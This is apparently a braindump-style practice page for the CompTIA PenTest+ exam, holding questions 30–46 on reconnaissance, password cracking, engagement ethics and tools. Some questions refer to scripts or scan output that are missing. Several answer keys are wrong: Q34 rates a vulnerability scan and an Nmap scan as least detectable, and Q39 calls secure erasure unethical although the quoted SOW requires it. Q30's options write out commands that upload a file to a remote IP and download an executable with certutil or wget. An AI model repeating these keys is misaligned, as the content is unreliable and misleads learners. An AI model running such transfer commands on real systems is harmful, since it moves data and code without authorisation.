PT0-002 Practice Exam and Study Guides - Verified By ActualCollection Updated 112 Questions [Q30-Q46]

NEW QUESTION 30
A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions. Which of the following commands would help the tester START this process?

  • A. powershell (New-Object System.Net.WebClient).UploadFile('http://192.168.2.124/upload.php', 'systeminfo.txt')
  • B. certutil -urlcache -split -f http://192.168.2.124/windows-binaries/accesschk64.exe
  • C. schtasks /query /fo LIST /v | find /I "Next Run Time:"
  • D. wget http://192.168.2.124/windows-binaries/accesschk64.exe -O accesschk64.exe

Answer: A

 

NEW QUESTION 31
A penetration tester wrote the following script to be used in one engagement:

Which of the following actions will this script perform?

  • A. Attempt to flood open ports.
  • B. Look for open ports.
  • C. Create an encrypted tunnel.
  • D. Listen for a reverse shell.

Answer: B

 

NEW QUESTION 32
A penetration tester recently completed a review of the security of a core network device within a corporate environment. The key findings are as follows:
* The following request was intercepted going to the network device:
GET /login HTTP/1.1
Host: 10.50.100.16
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept-Language: en-US,en;q=0.5
Connection: keep-alive
Authorization: Basic WU9VUilOQU1FOnNlY3JldHBhc3N3b3jk
* Network management interfaces are available on the production network.
* An Nmap scan returned the following:

Which of the following would be BEST to add to the recommendations section of the final report? (Choose two.)

  • A. Disable HTTP/301 redirect configuration.
  • B. Eliminate network management and control interfaces.
  • C. Enforce enhanced password complexity requirements.
  • D. Create an out-of-band network for management.
  • E. Disable or upgrade SSH daemon.
  • F. Implement a better method for authentication.

Answer: A,F

 

NEW QUESTION 33
You are a penetration tester running port scans on a server.
INSTRUCTIONS
Part 1: Given the output, construct the command that was used to generate this output from the available options.
Part 2: Once the command is appropriately constructed, use the given output to identify the potential attack vectors that should be investigated further.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Answer:

Explanation:
Part 1 - nmap 192.168.2.2 -sV -O
Part 2 - Weak SMB file permissions

 

NEW QUESTION 34
A penetration tester wants to perform reconnaissance without being detected. Which of the following activities have a MINIMAL chance of detection? (Choose two.)

  • A. Open-source research
  • B. Traffic sniffing
  • C. A vulnerability scan
  • D. An Nmap scan
  • E. A ping sweep
  • F. Port knocking

Answer: C,D

 

NEW QUESTION 35
A software development team is concerned that a new product's 64-bit Windows binaries can be deconstructed to the underlying code. Which of the following tools can a penetration tester utilize to help the team gauge what an attacker might see in the binaries?

  • A. OllyDbg
  • B. GDB
  • C. Drozer
  • D. Immunity Debugger

Answer: A

 

NEW QUESTION 36
A penetration tester conducted a vulnerability scan against a client's critical servers and found the following:

Which of the following would be a recommendation for remediation?

  • A. Implement a patch management plan
  • B. Utilize the secure software development life cycle
  • C. Deploy a user training program
  • D. Configure access controls on each of the servers

Answer: A

 

NEW QUESTION 37
A red team gained access to the internal network of a client during an engagement and used the Responder tool to capture important data. Which of the following was captured by the testing team?

  • A. Multiple handshakes
  • B. Encrypted file transfers
  • C. User hashes sent over SMB
  • D. IP addresses

Answer: C

 

NEW QUESTION 38
A penetration tester obtained the following results after scanning a web server using the dirb utility:
...
GENERATED WORDS: 4612
---- Scanning URL: http://10.2.10.13/ ----
+ http://10.2.10.13/about (CODE:200|SIZE:1520)
+ http://10.2.10.13/home.html (CODE:200|SIZE:214)
+ http://10.2.10.13/index.html (CODE:200|SIZE:214)
+ http://10.2.10.13/info (CODE:200|SIZE:214)
...
DOWNLOADED: 4612 - FOUND: 4
Which of the following elements is MOST likely to contain useful information for the penetration tester?

  • A. home.html
  • B. about
  • C. index.html
  • D. info

Answer: B

 

NEW QUESTION 39
A penetration tester is reviewing the following SOW prior to engaging with a client:
"Network diagrams, logical and physical asset inventory, and employees' names are to be treated as client confidential. Upon completion of the engagement, the penetration tester will submit findings to the client's Chief Information Security Officer (CISO) via encrypted protocols and subsequently dispose of all findings by erasing them in a secure manner."
Based on the information in the SOW, which of the following behaviors would be considered unethical? (Choose two.)

  • A. Seeking help with the engagement in underground hacker forums by sharing the client's public IP address
  • B. Utilizing public-key cryptography to ensure findings are delivered to the CISO upon completion of the engagement
  • C. Utilizing proprietary penetration-testing tools that are not available to the public or to the client for auditing and inspection
  • D. Retaining the SOW within the penetration tester's company for future use so the sales team can plan future engagements
  • E. Using a software-based erase tool to wipe the client's findings from the penetration tester's laptop
  • F. Failing to share with the client critical vulnerabilities that exist within the client architecture to appease the client's senior leadership team

Answer: E,F

 

NEW QUESTION 40
A penetration tester exploited a unique flaw on a recent penetration test of a bank. After the test was completed, the tester posted information about the exploit online along with the IP addresses of the exploited machines. Which of the following documents could hold the penetration tester accountable for this action?

  • A. ROE
  • B. MSA
  • C. NDA
  • D. SLA

Answer: C

 

NEW QUESTION 41
A penetration tester runs the unshadow command on a machine. Which of the following tools will the tester most likely use NEXT?

  • A. Cain and Abel
  • B. John the Ripper
  • C. Mimikatz
  • D. Hydra

Answer: B

 

NEW QUESTION 42
User credentials were captured from a database during an assessment and cracked using rainbow tables. Based on the ease of compromise, which of the following algorithms was MOST likely used to store the passwords in the database?

  • A. bcrypt
  • B. SHA-1
  • C. PBKDF2
  • D. MD5

Answer: D

 

NEW QUESTION 43
A penetration tester ran a ping -A command during an unknown environment test, and it returned a 128 TTL packet. Which of the following OSs would MOST likely return a packet of this type?

  • A. Android
  • B. Linux
  • C. Windows
  • D. Apple

Answer: C

 

NEW QUESTION 44
A penetration-testing team is conducting a physical penetration test to gain entry to a building. Which of the following is the reason why the penetration testers should carry copies of the engagement documents with them?

  • A. To validate the billing information with the client
  • B. As proof in case they are discovered
  • C. As backup in case the original documents are lost
  • D. To guide them through the building entrances

Answer: B

 

NEW QUESTION 45
A company recruited a penetration tester to configure wireless IDS over the network. Which of the following tools would BEST test the effectiveness of the wireless IDS solutions?

  • A. Wireshark
  • B. Aircrack-ng
  • C. Kismet
  • D. Wifite

Answer: B

 

NEW QUESTION 46
......